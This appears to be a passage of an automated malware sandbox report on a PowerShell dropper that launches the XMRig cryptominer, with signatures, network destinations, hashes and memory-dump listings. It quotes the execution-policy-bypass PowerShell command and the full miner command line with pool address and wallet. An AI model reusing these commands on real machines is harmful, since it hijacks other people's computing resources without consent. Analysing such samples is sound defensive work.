memory/2516-116-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-117-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-118-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-119-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-120-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-121-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-122-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-123-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-124-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-125-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-126-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-127-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-128-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-129-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-130-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-131-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-132-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-133-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-134-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-135-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-136-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-137-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-138-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-139-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-140-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-141-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-142-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-143-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-144-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-145-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-146-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-147-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-148-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-149-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-150-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-151-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-152-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-153-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-154-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-155-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-156-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
memory/2516-157-0x00007FF7CC1D0000-0x00007FF7CCE03000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:26
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4000 wrote to memory of 4252 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4000 wrote to memory of 4252 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.65.42.20.in-addr.arpa | udp |
Files
memory/4000-0-0x00007FF9F8C03000-0x00007FF9F8C05000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_21vrwc5i.d2c.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4000-10-0x00007FF9F8C00000-0x00007FF9F96C1000-memory.dmp
memory/4000-11-0x000001A67FA50000-0x000001A67FA72000-memory.dmp
memory/4000-12-0x00007FF9F8C00000-0x00007FF9F96C1000-memory.dmp
memory/4000-13-0x00007FF9F8C00000-0x00007FF9F96C1000-memory.dmp
memory/4000-15-0x000001A67FA80000-0x000001A67FA92000-memory.dmp
memory/4000-16-0x000001A67FA30000-0x000001A67FA3A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4252-47-0x0000024415970000-0x0000024415990000-memory.dmp
memory/4252-48-0x00000244159C0000-0x00000244159E0000-memory.dmp
memory/4252-49-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4000-50-0x00007FF9F8C03000-0x00007FF9F8C05000-memory.dmp
memory/4000-51-0x00007FF9F8C00000-0x00007FF9F96C1000-memory.dmp
memory/4252-52-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-54-0x0000024415A00000-0x0000024415A20000-memory.dmp
memory/4252-53-0x00000244159E0000-0x0000024415A00000-memory.dmp
memory/4000-55-0x00007FF9F8C00000-0x00007FF9F96C1000-memory.dmp
memory/4252-56-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-57-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-59-0x0000024415A00000-0x0000024415A20000-memory.dmp
memory/4252-58-0x00000244159E0000-0x0000024415A00000-memory.dmp
memory/4252-60-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-61-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-62-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-63-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-64-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-65-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-66-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-67-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-68-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-69-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-70-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-71-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-72-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-73-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-74-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-75-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-76-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-77-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-78-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-79-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-80-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-81-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-82-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-83-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-84-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-85-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-86-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-87-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-88-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-89-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-90-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-91-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-92-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-93-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-94-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-95-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-96-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-97-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-98-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-99-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-100-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-101-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-102-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-103-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-104-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-105-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-106-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-107-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-108-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-109-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-110-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-111-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-112-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-113-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-114-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-115-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-116-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-117-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
memory/4252-118-0x00007FF6E9D30000-0x00007FF6EA963000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:31
Platform
win11-20240426-en
Max time kernel
1799s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 988 wrote to memory of 2096 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 988 wrote to memory of 2096 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/988-0-0x00007FF815A93000-0x00007FF815A95000-memory.dmp
memory/988-1-0x000001A6C5640000-0x000001A6C5662000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hzl1sp4v.zvi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/988-10-0x00007FF815A90000-0x00007FF816552000-memory.dmp
memory/988-11-0x00007FF815A90000-0x00007FF816552000-memory.dmp
memory/988-12-0x00007FF815A90000-0x00007FF816552000-memory.dmp
memory/988-14-0x000001A6C56D0000-0x000001A6C56E2000-memory.dmp
memory/988-15-0x000001A6C56B0000-0x000001A6C56BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2096-46-0x0000019226370000-0x0000019226390000-memory.dmp
memory/2096-47-0x0000019227E40000-0x0000019227E60000-memory.dmp
memory/2096-48-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/988-49-0x00007FF815A90000-0x00007FF816552000-memory.dmp
memory/2096-51-0x0000019227E80000-0x0000019227EA0000-memory.dmp
memory/2096-50-0x0000019227E60000-0x0000019227E80000-memory.dmp
memory/988-54-0x00007FF815A90000-0x00007FF816552000-memory.dmp
memory/2096-52-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/988-53-0x00007FF815A93000-0x00007FF815A95000-memory.dmp
memory/2096-55-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-56-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-58-0x0000019227E80000-0x0000019227EA0000-memory.dmp
memory/2096-57-0x0000019227E60000-0x0000019227E80000-memory.dmp
memory/2096-59-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-60-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-61-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-62-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-63-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-64-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-65-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-66-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-67-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-68-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-69-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-70-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-71-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-72-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-73-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-74-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-75-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-76-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-77-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-78-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-79-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-80-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-81-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-82-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-83-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-84-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-85-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-86-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-87-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-88-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-89-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-90-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-91-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-92-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-93-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-94-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-95-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-96-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-97-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-98-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-99-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-100-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-101-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-102-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-103-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-104-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-105-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-106-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-107-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-108-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-109-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-110-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-111-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-112-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-113-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-114-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-115-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-116-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
memory/2096-117-0x00007FF62F5D0000-0x00007FF630203000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:45
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
